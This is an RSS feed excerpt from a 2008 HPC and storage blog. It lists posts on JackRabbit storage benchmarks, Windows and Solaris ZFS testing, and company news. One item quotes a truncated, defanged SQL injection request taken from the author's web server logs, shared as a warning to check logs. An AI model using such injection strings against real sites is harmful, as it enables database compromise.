      <link>https://blog.scalability.org/2008/08/rackable-buys-terrascale-and-now-dumps-terrascale/</link>
      <pubDate>Tue, 19 Aug 2008 01:00:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/rackable-buys-terrascale-and-now-dumps-terrascale/</guid>
      <description>TerraScale were an innovative bunch that developed some interesting technologies around the xfs file system, and made it scale in a cluster. Some time ago, Rackable bought them. Now it appears that Rackable is pulling back from this market, and is putting TerraScale &amp;hellip; er &amp;hellip; RapidScale on the auction block. Ok, its not quite like this &amp;hellip; they have engaged a financial advisor to &amp;ldquo;seek strategic alternatives&amp;rdquo; for the group.</description>
    </item>
    
    <item>
      <title>JackRabbit-M bonnie&#43;&#43; results</title>
      <link>https://blog.scalability.org/2008/08/jackrabbit-m-bonnie-results/</link>
      <pubDate>Mon, 18 Aug 2008 16:45:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/jackrabbit-m-bonnie-results/</guid>
      <description>JackRabbit-M run of bonnie++ 1.0.3 no patches, run in the usual way. bonnie++ -u root -d /big -f
nets these measurements:
bonnie++ -u root -d /big -f Using uid:0, gid:0. Writing intelligently...done Rewriting...done Reading intelligently...done start &#39;em...done...done...done... Create files in sequential order...done. Stat files in sequential order...done. Delete files in sequential order...done. Create files in random order...done. Stat files in random order...done. Delete files in random order...done. Version 1.03 ------Sequential Output------ --Sequential Input- --Random- -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks-- Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP jackrabbit 129104M 668525 43 166778 18 1071018 66 426.</description>
    </item>
    
    <item>
      <title>JackRabbit-M update</title>
      <link>https://blog.scalability.org/2008/08/jackrabbit-m-update/</link>
      <pubDate>Sat, 16 Aug 2008 14:50:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/jackrabbit-m-update/</guid>
      <description>JackRabbit-M [you will be able to order these online in short order from our store]. More tests, more burn in. I will describe this unit in a moment. We are taking this one out to the test track. Running a few time trials. Cracking the throttle. Wide open.
[queue Don Felder&amp;rsquo;s &amp;ldquo;Heavy Metal&amp;quot;: this unit masses north of 60 kg &amp;hellip; ] raw write speed:
[root@jackrabbit ~]# dd if=/dev/zero of=/big/big.file .</description>
    </item>
    
    <item>
      <title>On being a 2 x 4 (on being a two by four)</title>
      <link>https://blog.scalability.org/2008/08/on-being-a-2-x-4-on-being-a-two-by-four/</link>
      <pubDate>Sat, 16 Aug 2008 00:55:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/on-being-a-2-x-4-on-being-a-two-by-four/</guid>
      <description>For those not familiar with this vernacular, a 2x4 (two by four) is a bit of wood, 2 inches by 4 inches in cross-section. It is sometimes brandished as a defensive or offensive weapon. You use a 2x4 to beat someone into submission &amp;hellip; or, more correctly, a metaphorical 2x4 &amp;hellip; lest you wind up on the wrong side of the law. This post is about the actualization of the metaphor.</description>
    </item>
    
    <item>
      <title>that was boring .... wordpress 2.6.1 upgrade</title>
      <link>https://blog.scalability.org/2008/08/that-was-boring-wordpress-261-upgrade/</link>
      <pubDate>Fri, 15 Aug 2008 23:26:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/that-was-boring-wordpress-261-upgrade/</guid>
      <description>No &amp;hellip; really boring. Click click click &amp;hellip;. (iterate N times) click. You are done. Whatever happened to those fun moments of abject terror when you realized you just blew away an important DB table &amp;hellip; Good job WP folk.</description>
    </item>
    
    <item>
      <title>this is so ... so ... very ... wrong ... (ROTFLMAO)</title>
      <link>https://blog.scalability.org/2008/08/this-is-so-so-very-wrong-rotflmao/</link>
      <pubDate>Tue, 12 Aug 2008 11:32:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/this-is-so-so-very-wrong-rotflmao/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Bandwidth woes, hopefully a thing of the past</title>
      <link>https://blog.scalability.org/2008/08/bandwidth-woes-hopefully-a-thing-of-the-past/</link>
      <pubDate>Wed, 06 Aug 2008 04:18:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/bandwidth-woes-hopefully-a-thing-of-the-past/</guid>
      <description>In moving to our new facilities, we changed from an 11 Mb/1.5 Mb line to a 6 Mb/0.8 Mb line. This was due to the availability of service to that area. Yeah, we could do a 1.5 Mb/1.5 Mb T1 line, but this is slow compared to what we had, and our experience with SLAs suggests that they aren&amp;rsquo;t honored as we might like. So we installed the 6 Mb line.</description>
    </item>
    
    <item>
      <title>of all the amateur ... dumb ... silly errors I have ever seen, this one tops them</title>
      <link>https://blog.scalability.org/2008/08/of-all-the-amateur-dumb-silly-errors-i-have-ever-seen-this-one-tops-them/</link>
      <pubDate>Wed, 06 Aug 2008 00:55:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/of-all-the-amateur-dumb-silly-errors-i-have-ever-seen-this-one-tops-them/</guid>
      <description>&amp;hellip; and of course, I made it. And then went on vacation. No I am not kidding. Yes, I tested it. No, not the way I should have&amp;hellip;
Yeah, after our move, I redirected www.scalableinformatics.com to our new site. Yessirre. I really checked it out. Carefully. Wouldn&amp;rsquo;t want to make an error. Like directing it to the wrong machine. Nosirree. Wouldn&amp;rsquo;t want to do that. Too bad. Thats what I did.</description>
    </item>
    
    <item>
      <title>you may have noticed the sparse posting ...</title>
      <link>https://blog.scalability.org/2008/08/you-may-have-noticed-the-sparse-posting/</link>
      <pubDate>Fri, 01 Aug 2008 14:06:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/you-may-have-noticed-the-sparse-posting/</guid>
      <description>&amp;hellip; no, I haven&amp;rsquo;t left the building. Been on vacation this past week in lovely northern Michigan. In Mackinac to be precise. Going to St. Ignace and the Soo locks today (St. Sault Marie). Should be fun. Weather is lovely, had some great morning pictures of the sunrise over the waters on the north shore of the US &amp;hellip; Back next week &amp;hellip;</description>
    </item>
    
    <item>
      <title>Not official yet, but ...</title>
      <link>https://blog.scalability.org/2008/07/not-official-yet-but/</link>
      <pubDate>Sat, 26 Jul 2008 14:37:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/not-official-yet-but/</guid>
      <description>&amp;hellip; day job just joined Automation Alley. Will put an official announcement up soon. Once this goes live, the day job will be offering discounted JackRabbit and HPC systems/consulting to other members. Part of this comes from a desire to grow our business in Michigan, part comes from an understanding of the Michigan economic realities. If you haven&amp;rsquo;t heard about the state of the economy in Michigan, there is simply no way to sugar coat it.</description>
    </item>
    
    <item>
      <title>deja vu</title>
      <link>https://blog.scalability.org/2008/07/deja-vu/</link>
      <pubDate>Fri, 25 Jul 2008 03:17:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/deja-vu/</guid>
      <description>Posted without comment.</description>
    </item>
    
    <item>
      <title>ok ... more (similar) attacks</title>
      <link>https://blog.scalability.org/2008/07/ok-more-similar-attacks/</link>
      <pubDate>Wed, 23 Jul 2008 22:17:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/ok-more-similar-attacks/</guid>
      <description>Check your logs folks, someone is trying to crack into your systems. More &amp;hellip; interesting &amp;hellip; logs.</description>
    </item>
    
    <item>
      <title>A new attack in the wild, and in my logs</title>
      <link>https://blog.scalability.org/2008/07/a-new-attack-in-the-wild-and-in-my-logs/</link>
      <pubDate>Wed, 23 Jul 2008 21:59:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/a-new-attack-in-the-wild-and-in-my-logs/</guid>
      <description>Have a look at this (safe, defanged) From a request:
?%27;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076 617263686172283430303029204445434C415245205461626C655F4375 .... 655F437572736F72%20AS%20CHAR(4000));EXEC(@S); Neat&amp;hellip; huh? Direct injection attack. Removed most of the payload. Didn&amp;rsquo;t succeed. Came from Malasia:
60.48.212.49 [W| B | U ] |MYS , Johor Bahru | 23-Jul 12:30:41 /?&#39;;DECLARE%2... 0));EXEC(@S); - 60.48.212.49 [W| B | U ] |MYS , Johor Bahru | 23-Jul 12:30:41 /?;DECLARE%20... 0));EXEC(@S); -  And Brooklyn
24.184.25.236 [W| B | U ] |USA , Brooklyn | 23-Jul 12:04:02 /?</description>
    </item>
    
    <item>
      <title>557 days ... and then I (accidentally) yank the power plug</title>
      <link>https://blog.scalability.org/2008/07/557-days-and-then-i-accidentally-yank-the-power-plug/</link>
      <pubDate>Tue, 22 Jul 2008 02:29:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/557-days-and-then-i-accidentally-yank-the-power-plug/</guid>
      <description>We are prepping for the move to the new facility. Nicer digs, and we are moving some infrastructure over. Our main internal server has been (until about 11pm this evening) up for 557 days. Continuously, no down time. Planned or unplanned. Of course, all this means is that, as time goes on, some klutz is gonna do something silly.
Well, I&amp;rsquo;m the klutz. While pulling a power plug out of the PDU, I didn&amp;rsquo;t notice I had dislodged the adjacent plug.</description>
    </item>
    
    <item>
      <title>Taking a JackRabbit-M for a spin</title>
      <link>https://blog.scalability.org/2008/07/taking-a-jackrabbit-m-for-a-spin/</link>
      <pubDate>Sun, 20 Jul 2008 01:19:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/taking-a-jackrabbit-m-for-a-spin/</guid>
      <description>This is a new 24TB raw JackRabbit-M system we are burning in for a customer. Unit will ship in short order, but I thought you might like to see what happens when we take it for a spin. And when we crack the throttle.
First the basics: 24x 1TB drives (SATA II nearline drives, not desktop units), 4U case. 2 hot spares, RAID6 (yes, these numbers are with RAID6). System has 16 GB RAM.</description>
    </item>
    
    <item>
      <title>Yow!</title>
      <link>https://blog.scalability.org/2008/07/yow/</link>
      <pubDate>Tue, 15 Jul 2008 14:42:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/yow/</guid>
      <description>Expected lifetime (e.g. how long until a hacker pwnz it? or put another way, how long until you lose control of this ) windows system on the internet? 4 minutes.</description>
    </item>
    
    <item>
      <title>OFED (partially building) on Fedora Core 9</title>
      <link>https://blog.scalability.org/2008/07/ofed-partially-building-on-fedora-core-9/</link>
      <pubDate>Sun, 13 Jul 2008 16:32:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/ofed-partially-building-on-fedora-core-9/</guid>
      <description>This was fun. Well, ok, it wasn&amp;rsquo;t. But it works now. The ofa_kernel rpm crashes and burns being rebuilt on FC9. As do sdp, rds, ibutils, and dapl. Fine. Also have to downgrade tcl to 8.4 from 8.5. Because the RPMs hard-link to a specific library in tk (which depends upon tcl). Again, fine.
Run the install.pl script. Select install. Select customize. Select everything but those things. Go get coffee. Note that the conversion to gcc 4.</description>
    </item>
    
    <item>
      <title>Horribly convoluted Linux kernel build processes (for a distribution)</title>
      <link>https://blog.scalability.org/2008/07/horribly-convoluted-linux-kernel-build-processes-for-a-distribution/</link>
      <pubDate>Sat, 12 Jul 2008 15:52:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/horribly-convoluted-linux-kernel-build-processes-for-a-distribution/</guid>
      <description>Suppose you want to build a new kernel RPM that incorporates a different kernel (slightly up or down from distribution baseline). You want to turn off all their patches, and simply build the kernel, the headers, the -devel, &amp;hellip; Can you do it? No I am serious&amp;hellip; can you do it? The following is a bit of a rant. Borne out of frustration with things that are designed broken (IMO).</description>
    </item>
    
    <item>
      <title>Imitation is the sincerest form of flattery</title>
      <link>https://blog.scalability.org/2008/07/imitation-is-the-sincerest-form-of-flattery/</link>
      <pubDate>Fri, 11 Jul 2008 04:12:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/imitation-is-the-sincerest-form-of-flattery/</guid>
      <description>In reviewing a new rev of some product that competes with our JackRabbit unit, I noted that the new rev actually copies a number of the good ideas we have been using in our JackRabbits for quite a while. I am impressed :) I guess if you can&amp;rsquo;t beat em, join em.</description>
    </item>
    
    <item>
      <title>A 72 TB JackRabbit ...</title>
      <link>https://blog.scalability.org/2008/07/a-72-tb-jackrabbit/</link>
      <pubDate>Fri, 11 Jul 2008 00:30:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/a-72-tb-jackrabbit/</guid>
      <description>Seagate just announced a 1.5 TB desktop drive, with the enterprise unit sure to follow. Delivery of desktop drives should be in August. If we used 48 of these in our 5U JackRabbit unit, we would be able to provide 72 TB raw. A rack full (8) would hit 576 TB raw, or nearly 0.6 PB/rack. FWIW: we have customers whom have requested the desktop drive variants. We see failure rates about the same as the enterprise/NL units.</description>
    </item>
    
    <item>
      <title>Windows 200x impressions after using it for testing</title>
      <link>https://blog.scalability.org/2008/07/windows-200x-impressions-after-using-it-for-testing/</link>
      <pubDate>Mon, 07 Jul 2008 14:15:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/windows-200x-impressions-after-using-it-for-testing/</guid>
      <description>We are in the midst of Solaris 10 testing for a customer. Explaining why Linux is so much faster (and more stable) on the hardware is getting old. So I&amp;rsquo;ll take a break and talk about the windows 200x experiences we had recently. A customer wanted to see performance on a number of things running on Windows 2003. They had a particular application that runs on it, and wanted to see what we could do with JackRabbit.</description>
    </item>
    
    <item>
      <title>Waiting for SCAT on x86/x64</title>
      <link>https://blog.scalability.org/2008/07/waiting-for-scat-on-x86x64/</link>
      <pubDate>Mon, 07 Jul 2008 02:08:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/waiting-for-scat-on-x86x64/</guid>
      <description>Another Solaris crash running bonnie++ during testing. I am convinced it is a driver issue, but before I go speaking to the people writing the driver, I want a good convincing stack trace to hand them (and a core file). I found the core files (shades of Irix past, I like the fact that I get them). Looked for SCAT (Solaris Crash Analysis Tool). 4.1 is out, for Sparc only. 5.</description>
    </item>
    
    <item>
      <title>zfs un-benchmarking</title>
      <link>https://blog.scalability.org/2008/07/zfs-un-benchmarking/</link>
      <pubDate>Sun, 06 Jul 2008 16:39:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/zfs-un-benchmarking/</guid>
      <description>So we have Solaris 10 installed on a JackRabbit-M. According to Sun&amp;rsquo;s license, as I have learned last night, we cannot report benchmark results without permission from Sun. Sad, but this is how they wish to govern information flow around their product. Our rationale for testing was to finally get some numbers that we can provide to users/customers about real zfs performance. There is a huge amount of (largely uncontested) information (emanating mainly from Sun and its agents) that zfs is a very fast file system.</description>
    </item>
    
    <item>
      <title>Is this a zfs bug or an IOzone bug?</title>
      <link>https://blog.scalability.org/2008/07/is-this-a-zfs-bug-or-an-iozone-bug/</link>
      <pubDate>Wed, 02 Jul 2008 23:01:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/is-this-a-zfs-bug-or-an-iozone-bug/</guid>
      <description>Hmmmmmmmmmm &amp;hellip;.
# /opt/csw/bin/iozone -Ra -n 16m -g 16g -y 16m -m -b sol10-jrm-large.xls Iozone: Performance Test of File I/O Version $Revision: 3.217 $ Compiled for 32 bit mode. Build: Solaris Contributors:William Norcott, Don Capps, Isom Crawford, Kirby Collins Al Slater, Scott Rhine, Mike Wisner, Ken Goss Steve Landherr, Brad Smith, Mark Kelly, Dr. Alain CYR, Randy Dunlap, Mark Montague, Dan Million, Jean-Marc Zucconi, Jeff Blomberg, Erik Habbinga, Kris Strecker. Run began: Wed Jul 2 18:47:07 2008 Excel chart generation enabled Auto Mode Using minimum file size of 16384 kilobytes.</description>
    </item>
    
    <item>
      <title>Solaris 10 5/08 and zfs on JackRabbit</title>
      <link>https://blog.scalability.org/2008/07/solaris-10-508-and-zfs-on-jackrabbit/</link>
      <pubDate>Wed, 02 Jul 2008 20:42:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/solaris-10-508-and-zfs-on-jackrabbit/</guid>
      <description>Yeah, it works.
# df -h Filesystem size used avail capacity Mounted on /dev/dsk/c0d0s0 7.9G 3.3G 4.5G 43% / /devices 0K 0K 0K 0% /devices ctfs 0K 0K 0K 0% /system/contract proc 0K 0K 0K 0% /proc mnttab 0K 0K 0K 0% /etc/mnttab swap 15G 896K 15G 1% /etc/svc/volatile objfs 0K 0K 0K 0% /system/object /usr/lib/libc/libc_hwcap1.so.1 7.9G 3.3G 4.5G 43% /lib/libc.so.1 fd 0K 0K 0K 0% /dev/fd swap 15G 112K 15G 1% /tmp swap 15G 32K 15G 1% /var/run /dev/dsk/c0d0s3 3.</description>
    </item>
    
    <item>
      <title>tracking other companies</title>
      <link>https://blog.scalability.org/2008/07/tracking-other-companies/</link>
      <pubDate>Wed, 02 Jul 2008 06:49:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/tracking-other-companies/</guid>
      <description>SGI and Clearspeed. SGI is now down to $4.90/share at its close. It dropped 11% yesterday. Market cap is $57M. Yow. Yeah, the market has been volatile. I am not sure that explains this. With 1600 employees, this is a value of $36k/person. They are rapidly getting to a place where their valuation and ours becomes comparable.
They are getting wins, but maybe the wins are not as profitable as they need &amp;hellip; or maybe the ones we hear about are the only ones rather than a representative set.</description>
    </item>
    
    <item>
      <title>Scalable Informatics 6% sale</title>
      <link>https://blog.scalability.org/2008/07/scalable-informatics-6-sales/</link>
      <pubDate>Tue, 01 Jul 2008 17:30:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/scalable-informatics-6-sales/</guid>
      <description>Day job (actually company) has been in business 6 years, and is having a 6% sale to celebrate! Basically any hardware (including JackRabbits, our Pegasus many core workstations, and HPC clusters) purchased and paid for in month of July 2008. Ping me if you would like info about any of these things.</description>
    </item>
    
    <item>
      <title>450 streaming clients, 3 machines and 3 Gb NICs</title>
      <link>https://blog.scalability.org/2008/06/450-streaming-clients-3-machines-and-3-gb-nics/</link>
      <pubDate>Mon, 30 Jun 2008 16:40:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/450-streaming-clients-3-machines-and-3-gb-nics/</guid>
      <description>So I built this thing called run.pl to run N simultaneous instances of a command. To use it, you type run.pl N the_command_you_want_to_run_N_times_simultaneously So if I want to run 10 uname&amp;rsquo;s on my laptop &amp;hellip;
landman@lightning:~$ ./run.pl 10 uname O[1]: Linux O[2]: Linux O[3]: Linux O[4]: Linux O[5]: Linux O[6]: Linux O[7]: Linux O[8]: Linux O[9]: Linux O[10]: Linux  Cool huh &amp;hellip; Ok. Now lets see how many mplayers will swamp the NIC and CPU.</description>
    </item>
    
    <item>
      <title>Stream this ... no ... really ...</title>
      <link>https://blog.scalability.org/2008/06/stream-this-no-really/</link>
      <pubDate>Wed, 25 Jun 2008 04:45:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/stream-this-no-really/</guid>
      <description>Ok. I asked for pointers to free as in Libre video. Stuff we can use for testing streaming performance. And load the JackRabbit system, with multiple clients pulling these videos. So first you need a video server. Well, IIS can do it in windows, but as I have discovered, Apache 2.2.9 does a somewhat better job of serving media on Windows 2003. Not sure why yet, may look. So now we have the mpeg of &amp;ldquo;The Brain that wouldn&amp;rsquo;t die&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>What happened to Youtube?  Why isn&#39;t it as good as Liveleak?</title>
      <link>https://blog.scalability.org/2008/06/what-happened-to-youtube-why-isnt-it-as-good-as-liveleak/</link>
      <pubDate>Wed, 25 Jun 2008 00:43:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/what-happened-to-youtube-why-isnt-it-as-good-as-liveleak/</guid>
      <description>Youtube used to be &amp;ldquo;the&amp;rdquo; video site. Yeah, there are lots of competitors out there now. Sort of like social networks for a while. But Youtube has an issue. Click on an embedded vide in a web site or a blog, and it is at best a crap shoot as to whether you will get anything playing. Most of the time now, we don&amp;rsquo;t. This is true on Windows, on Linux, with the latest Flash.</description>
    </item>
    
    <item>
      <title>... and a quick bonnie session (still untuned)</title>
      <link>https://blog.scalability.org/2008/06/and-a-quick-bonnie-session-still-untuned/</link>
      <pubDate>Mon, 23 Jun 2008 03:46:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/and-a-quick-bonnie-session-still-untuned/</guid>
      <description>Again, 24 drive bay JackRabbit storage system.
Version 1.03 ------Sequential Output------ --Sequential Input- --Random- -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks-- Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP jrs8 32088M 511057 49 228336 35 1046117 91 514.5 0 ------Sequential Create------ --------Random Create-------- -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete-- files /sec %CP /sec %CP /sec %CP /sec %CP /sec %CP /sec %CP 16 21727 95 +++++ +++ 25751 99 22791 99 +++++ +++ 21702 98 jrs8,32088M,,,511057,49,228336,35,,,1046117,91,514.</description>
    </item>
    
    <item>
      <title>Trial run of JackRabbit-M</title>
      <link>https://blog.scalability.org/2008/06/trial-run-of-jackrabbit-m/</link>
      <pubDate>Sun, 22 Jun 2008 20:59:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/trial-run-of-jackrabbit-m/</guid>
      <description>Now that I have run through the 32 bit windows portion of the benchmark for the customer, I want to compare to our default way of shipping the units. So I fired up our default CF load, rebuilt the RAID. Simple little test runs, nothing to see here (no tuning yet)
The really simple minded tests &amp;hellip; how quickly can we pull from the disk and the buffer cache.
root@jrs8:~/mdadm-2.6.6# hdparm -tT /dev/md0 /dev/md0: Timing cached reads: 8862 MB in 2.</description>
    </item>
    
    <item>
      <title>W2k3 impressions day 2</title>
      <link>https://blog.scalability.org/2008/06/w2k3-impressions-day-2/</link>
      <pubDate>Sun, 22 Jun 2008 19:15:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/w2k3-impressions-day-2/</guid>
      <description>Ok, now I know why Microsoft has been working so hard on W2k8. Because W2k3 doesn&amp;rsquo;t scale well under load. Using our test rigs, and the apache &amp;ldquo;ab&amp;rdquo; program, we can see huge differences in the same hardware (literally the same, simply swapping out boot drives), between W2k8 and W2k3, with the latter barely about to eek out 60% of the theoretical max.
With W2k8, we were getting about 1 GB/s (8Gb/s) out of the unit with 10 clients running ab (specifically &amp;lsquo;ab -c 1 -n 100 -v 1 http://192.</description>
    </item>
    
    <item>
      <title>W2k3 vs W2k8 first impressions</title>
      <link>https://blog.scalability.org/2008/06/w2k3-vs-w2k8-first-impressions/</link>
      <pubDate>Sat, 21 Jun 2008 20:56:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/w2k3-vs-w2k8-first-impressions/</guid>
      <description>W2k8 was not hard to install. Actually it was almost easy. Administration wasn&amp;rsquo;t hard. Most things went right on. Performance was ok. W2k3 was a royal pain to install, and I am not done yet. Administration &amp;hellip; well, between the network adapters which, after being told to use a fixed IP address seem to still wish to acquire an IP address, to the IIS which refuses to install unless SP2 CD is available (this is W2k3 SP2 BTW) &amp;hellip;</description>
    </item>
    
    <item>
      <title>Figured out the BSOD for W2k3 Server</title>
      <link>https://blog.scalability.org/2008/06/figured-out-the-bsod-for-w2k3-server/</link>
      <pubDate>Sat, 21 Jun 2008 17:47:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/figured-out-the-bsod-for-w2k3-server/</guid>
      <description>This was annoying. Let the record show that W2k3 server doesn&amp;rsquo;t grok AHCI. So if you are trying to install it and it BSODs on you, turn off AHCI and redo your boot drive config in bios. Yeah, you give up performance, and a better interface. But it will boot now, without crashing.</description>
    </item>
    
    <item>
      <title>JackRabbit too fast for windows ...</title>
      <link>https://blog.scalability.org/2008/06/jackrabbit-too-fast-for-windows/</link>
      <pubDate>Thu, 19 Jun 2008 19:24:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/jackrabbit-too-fast-for-windows/</guid>
      <description>&amp;hellip; or there is a bug in the performance monitor. While I would like to believe the former (that JackRabbit is too fast), the latter is likely true. Look at this image, and then see the highlighted second image. Discussion in a moment.
[ ](http://scalability.org/images/Screenshot-1.png)
and
[ ](http://scalability.org/images/Screenshot-small-1.png)
Whats that? -1.97GB/s? So this is running IOmeter. We are seeing sustained about 1.15 GiB/s +/- a bit. Bouncing all over the place though.</description>
    </item>
    
    <item>
      <title>&#34;But you can&#39;t do that!&#34;</title>
      <link>https://blog.scalability.org/2008/06/but-you-cant-do-that/</link>
      <pubDate>Wed, 18 Jun 2008 13:37:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/but-you-cant-do-that/</guid>
      <description>About 3 years ago, I was at a Sun HPC consortium meeting, where there was excitement over the possibility of getting 1TFLOP into 2.5 racks with an ultra-dense server. This was cool. It was awesome. One of the conference organizers was talking to me about this, saying it was the densest possible system (at that time). Having just been through the accelerator card high level design process for a business plan/company concept we were pitching to VCs, I innocently (ok, well, not so innocently) asked &amp;hellip; &amp;ldquo;Well, what if you could get a real sustainable 1TFLOP in a 4U box?</description>
    </item>
    
    <item>
      <title>Windows 2008 drivers, benchmarking, and loading of the drives/network</title>
      <link>https://blog.scalability.org/2008/06/windows-2008-drivers-benchmarking-and-loading-of-the-drivesnetwork/</link>
      <pubDate>Wed, 18 Jun 2008 05:01:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/windows-2008-drivers-benchmarking-and-loading-of-the-drivesnetwork/</guid>
      <description>Happily, the Intel site has the right drivers for Windows 2008 for the motherboard gigabits. Just ordered some additional quad cards and a better network switch so we can push this harder. With 4 gigabit clients, we are seeing about 3.5x 1 GbE port in bandwidth. Working on it. Our test is incredibly simple. Set up IIS7 to serve files from a directory. Create 100 files of 100 MB each. System has 4 GB ram (ok more than that, but it is running 32 bit version of windows 2008, so all it sees is 4gb).</description>
    </item>
    
    <item>
      <title>Name and logo generator for your startup! Get &#39;em while they&#39;re hot!</title>
      <link>https://blog.scalability.org/2008/06/name-and-logo-generator-for-your-startup-get-em-while-theyre-hot/</link>
      <pubDate>Wed, 18 Jun 2008 03:16:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/name-and-logo-generator-for-your-startup-get-em-while-theyre-hot/</guid>
      <description>Too funny &amp;hellip;</description>
    </item>
    
    <item>
      <title>Agglomeration of news</title>
      <link>https://blog.scalability.org/2008/06/agglomeration-of-news/</link>
      <pubDate>Tue, 17 Jun 2008 12:10:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/agglomeration-of-news/</guid>
      <description>First, by now you have heard Tesla-10 is out. This is a significant performance step up, and I believe it has double precision capability. This is a hardware acceleration platform. Roadrunner hit the PetaFLOP regime. What is important about this is that it did it at a lower power than many had predicted a PetaFLOP would require, and did it somewhat sooner than others had been predicting. This is an accelerated supercomputer, using Cell technology.</description>
    </item>
    
    <item>
      <title>Secure remote desktop with stunnel</title>
      <link>https://blog.scalability.org/2008/06/secure-remote-desktop-with-stunnel/</link>
      <pubDate>Sun, 15 Jun 2008 16:42:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/secure-remote-desktop-with-stunnel/</guid>
      <description>This is nice. We have set up a secure remote desktop with Stunnel for Windows 2008 server on JackRabbit M. Vijay is working on doing some setup for our benchmarks, and I wanted a way to give him access while he works remotely. Sure enough, setup wasn&amp;rsquo;t too painful, simply follow directions at this link. Still have to order extra NICs and a new gigabit switch, but otherwise we are about ready to load test &amp;hellip;</description>
    </item>
    
    <item>
      <title>What he said!</title>
      <link>https://blog.scalability.org/2008/06/what-he-said-2/</link>
      <pubDate>Fri, 13 Jun 2008 15:01:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/what-he-said-2/</guid>
      <description>Up early on a friday morning, working through todays&#39; issues and &amp;hellip; found this article on Linux Magazine by the esteemed Doug Eadline. I was in on the discussion that he refers to, and pointed out that you do in fact get what you pay for, and that you will not get an engineered system in many cases. Worse, the configs will likely be those that minimize vendor costs, as that is the problem they are attempting to solve in a low margin business (clusters).</description>
    </item>
    
    <item>
      <title>SUA impressions</title>
      <link>https://blog.scalability.org/2008/06/sua-impressions/</link>
      <pubDate>Fri, 13 Jun 2008 01:42:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/sua-impressions/</guid>
      <description>A while ago, I had been advised to try SUA as part of windows. I was told it was much better than cygwin, and it is supported by Microsoft. Stuff will work, I was told. Well, of these statements, I can say I believe &amp;ldquo;supported by Microsoft&amp;rdquo; is probably the true one. Pulled down bonnie tarball. Tried to compile it. No luck. Pulled down IOzone tarball. Tried to compile it. No luck.</description>
    </item>
    
    <item>
      <title>Darned thing BSODs right away ...</title>
      <link>https://blog.scalability.org/2008/06/darned-thing-bsods-right-away/</link>
      <pubDate>Thu, 12 Jun 2008 19:35:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/darned-thing-bsods-right-away/</guid>
      <description>There we are, trying to use W2k3 server for the customer benchmark on JackRabbit. So we install it &amp;hellip; or try to install it and &amp;hellip; BSOD (growl)
No, I am not going to tear into Windows on this. W2k3 is old software kit. Yes, I did hit F6 to try to fix it, and add drivers. No, it never got to the point of letting me. Won&amp;rsquo;t spend more time on this.</description>
    </item>
    
    <item>
      <title>Desktop snapshot of JackRabbit running Windows 2008 RC2</title>
      <link>https://blog.scalability.org/2008/06/desktop-snapshot-of-jackrabbit-running-windows-2008-rc2/</link>
      <pubDate>Wed, 11 Jun 2008 11:57:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/desktop-snapshot-of-jackrabbit-running-windows-2008-rc2/</guid>
      <description>Why not. JackRabbit-M (24 bay unit) running W2k8 RC2.
[ ](http://scalability.org/images/w2k8-JRM.png)</description>
    </item>
    
    <item>
      <title>More W2k8 thoughts on JackRabbit M</title>
      <link>https://blog.scalability.org/2008/06/more-w2k8-thoughts-on-jackrabbit-m/</link>
      <pubDate>Wed, 11 Jun 2008 11:44:35 +0000</pubDate>
      
